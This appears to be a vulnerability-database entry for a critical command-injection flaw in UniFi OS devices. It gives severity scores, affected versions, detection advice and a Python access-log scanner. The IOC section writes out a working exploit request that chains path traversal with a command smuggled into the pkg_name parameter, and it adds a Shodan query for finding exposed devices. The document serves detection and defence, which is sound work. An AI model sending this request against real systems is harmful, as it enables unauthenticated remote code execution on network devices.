CVE-2026-34910
published 2026-05-22

CVE-2026-34910: A malicious actor with access to the network could exploit an Improper Input Validation vulnerability found in UniFi OS devices to execute a Command Injection.

Priority: P1 (100, critical)
CVSS 3.1: 10
Vector: AV:N / AC:L / PR:N / UI:N / S:C / C:H / I:H / A:H
Tags: KEV, ITW, EXPLOIT
CISA Known Exploited Vulnerability, due 2026-06-26
Exploited in the wild
EPSS: 78.55% (99.5th percentile)

Affected

62 ranges · showing 25

Vendor        Product         Version range  Fixed in
ubiquiti_inc  efg             < 5.1.12       5.1.12
ubiquiti_inc  envr            < 5.1.12       5.1.12
ubiquiti_inc  envr-core       < 5.1.12       5.1.12
ubiquiti_inc  express_7       < 5.1.12       5.1.12
ubiquiti_inc  ucg-fiber       < 5.1.12       5.1.12
ubiquiti_inc  ucg-industrial  < 5.1.12       5.1.12
ubiquiti_inc  ucg-max         < 5.1.12       5.1.12
ubiquiti_inc  ucg-ultra       < 5.1.12       5.1.12
ubiquiti_inc  uck             < 5.1.12       5.1.12
ubiquiti_inc  uck-enterprise  < 5.1.12       5.1.12
ubiquiti_inc  uckp            < 5.1.12       5.1.12
ubiquiti_inc  udm             < 5.1.12       5.1.12
ubiquiti_inc  udm-beast       < 5.1.11       5.1.11
ubiquiti_inc  udm-pro         < 5.1.12       5.1.12
ubiquiti_inc  udm-pro-max     < 5.1.12       5.1.12
ubiquiti_inc  udm-se          < 5.1.12       5.1.12
ubiquiti_inc  udr             < 5.1.12       5.1.12
ubiquiti_inc  udr-5g          < 5.1.12       5.1.12
ubiquiti_inc  udr7            < 5.1.12       5.1.12
ubiquiti_inc  udw             < 5.1.12       5.1.12
ubiquiti_inc  unas-2          < 5.1.10       5.1.10
ubiquiti_inc  unas-4          < 5.1.10       5.1.10
ubiquiti_inc  unas-pro        < 5.1.10       5.1.10
ubiquiti_inc  unas-pro-4      < 5.1.10       5.1.10
ubiquiti_inc  unas-pro-8      < 5.1.10       5.1.10

Detection & IOCs (extracted from sources)

url: GET /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=%3b+nslookup+{{interactsh-url}}+%3b HTTP/1.1
other: shodan-query: html:"UniFi OS"
yara: matchers: dsl: contains_any(body, "CODE_SYSTEM_ERROR", "System failure") AND contains(interactsh_protocol, "dns") AND status_code == 200
  • Look for path traversal sequences in requests targeting /api/auth/validate-sso/ — the authentication component evaluates the raw request URI while Nginx routes based on a normalized URI, enabling auth bypass to reach protected internal routes.
  • Monitor requests to the package-update endpoint 'ucs/update/latest_package' for unsanitized user input in the pkg_name parameter, which is passed directly into a shell command.
  • Because the attack requires no authentication, there will be no failed-login trail. Focus detection on process and network telemetry rather than auth logs.
  • CVE-2026-34910 is chained with CVE-2026-34908 (auth bypass) and CVE-2026-34909 (path traversal) in a single-request RCE exploit delivering a root reverse shell; detections should consider the full chain.
  • The detection script does NOT detect active attacks, past exploitation, or the presence of persistence mechanisms/backdoors — only current vulnerability status.
  • Organizations applying the patch should first confirm the system has not already been compromised before trusting the patched state.
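
The first two checks above (traversal under /api/auth/validate-sso/ and shell metacharacters in pkg_name) can be run over web access logs. The following is an added example, not code from this page, the vendor, or any referenced template. It assumes an Nginx combined-format access log that records the raw request line; the pkg_name allowlist and all sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

REQ_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
TRAVERSAL = re.compile(r"(?:^|/)\.\.(?:/|$)")
SSO_PREFIX = "/api/auth/validate-sso/"
UPDATE_ROUTE = "ucs/update/latest_package"
SAFE_PKG = re.compile(r"[A-Za-z0-9._-]+")  # assumed allowlist for package names

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded separators are seen too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the set of findings for one access-log line."""
    match = REQ_RE.search(line)
    if not match:
        return set()
    parts = urlsplit(match.group("target"))
    path = fully_decode(parts.path).replace("\\", "/").lower()
    findings = set()
    # Raw URI starts in the SSO route but normalizes to somewhere else.
    if path.startswith(SSO_PREFIX) and TRAVERSAL.search(path):
        findings.add("sso-path-traversal")
    # Any route to the update endpoint: pkg_name must look like a plain name.
    if UPDATE_ROUTE in path:
        for value in parse_qs(parts.query).get("pkg_name", []):
            if not SAFE_PKG.fullmatch(fully_decode(value)):
                findings.add("pkg_name-unsafe-chars")
    return findings

# Constructed sample lines (documentation IP ranges, placeholder host and package).
SAMPLE = [
    '192.0.2.10 - - [01/Jun/2026:10:00:00 +0000] "GET /api/auth/validate-sso/abc123 HTTP/1.1" 200 52',
    '198.51.100.7 - - [01/Jun/2026:10:00:05 +0000] "GET /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=%3b+nslookup+example.invalid+%3b HTTP/1.1" 200 88',
    '198.51.100.7 - - [01/Jun/2026:10:00:09 +0000] "GET /api/auth/validate-sso/%252e%252e%252fproxy/x HTTP/1.1" 404 0',
    '192.0.2.10 - - [01/Jun/2026:10:01:00 +0000] "GET /proxy/users/api/v2/ucs/update/latest_package?pkg_name=unifi-core HTTP/1.1" 200 140',
]

def scan(lines):
    """Return (line_number, sorted findings) for every suspicious line."""
    hits = ((n, sorted(classify(l))) for n, l in enumerate(lines, 1))
    return [(n, f) for n, f in hits if f]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE):
        print(number, ", ".join(findings))
```

A hit records an attempt seen in the request log only; it says nothing about whether the injected command ran, so it complements the process and network telemetry noted above rather than replacing it.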

CVSS provenance

nvd        v3.1  10.0  CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck        10.0  CRITICAL
cisa             10.0  CRITICAL